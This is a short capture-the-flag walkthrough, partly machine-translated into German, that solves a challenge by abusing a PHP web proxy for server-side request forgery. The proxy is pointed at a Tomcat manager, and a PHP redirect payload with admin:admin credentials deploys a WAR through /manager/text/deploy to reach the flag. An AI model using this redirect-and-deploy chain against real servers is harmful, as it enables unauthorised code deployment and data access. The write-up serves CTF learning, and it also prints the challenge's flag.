CTF Challenge Description:

The challenge contains a php webproxy and a Tomcat server which has the Tomcat manager app deployed andwas only accessible via the php webproxy.

https://github.com/Athlon1600/php-proxy-app is what is running in the php-proxycontainer and it has a few open issues, including some that look like they could be security-relevant.

Lösung

To visit the tomcat container from the proxy, simply enter 127.0.0.1:8888 to view the tomcat webpage. Tomcat mentions an admin interface should be at /manager/html but upon visiting 127.0.0.1:8888/manager/html through the proxy we get a “401 unauthorized” error.

We also find the username and password (manager-web.xml) and that /manager/text exists as an interface for scripts.

Wir können benutzen /manager/text/deploy to deploy the folder that contains the flag and visit that like any other webpage.

Cyber Security Study Notes

OSCP-Studiennotizen

Then we can host this on our local attacker machine. The server address can be:

http://127.0.0.1:8000/test

<?PHP
Header('location: http://admin:admin@127.0.0.1:8888/manager/text/deploy?path=/foofour&war=file:/c9fdb1da2a41a453ae291a1fb5d2519701bc60f6');
?>
  1. Redirect the proxy to  http://127.0.0.1:8000/test
  2. Then redirect it to http://127.0.0.1:8888/foofour/flag.txt
  3. Flag: INS{SSRF-As-A-Service}

CTF Walkthrough Playlist

,
Anmerkungen anzeigen

Motasem

Über den Autor

Ich erstelle Notizen zur Cybersicherheit, Notizen zum digitalen Marketing und Online-Kurse. Ich biete auch Beratung zum digitalen Marketing an, einschließlich, aber nicht beschränkt auf SEO, Google- und Meta-Anzeigen und CRM-Verwaltung.

Artikel anzeigen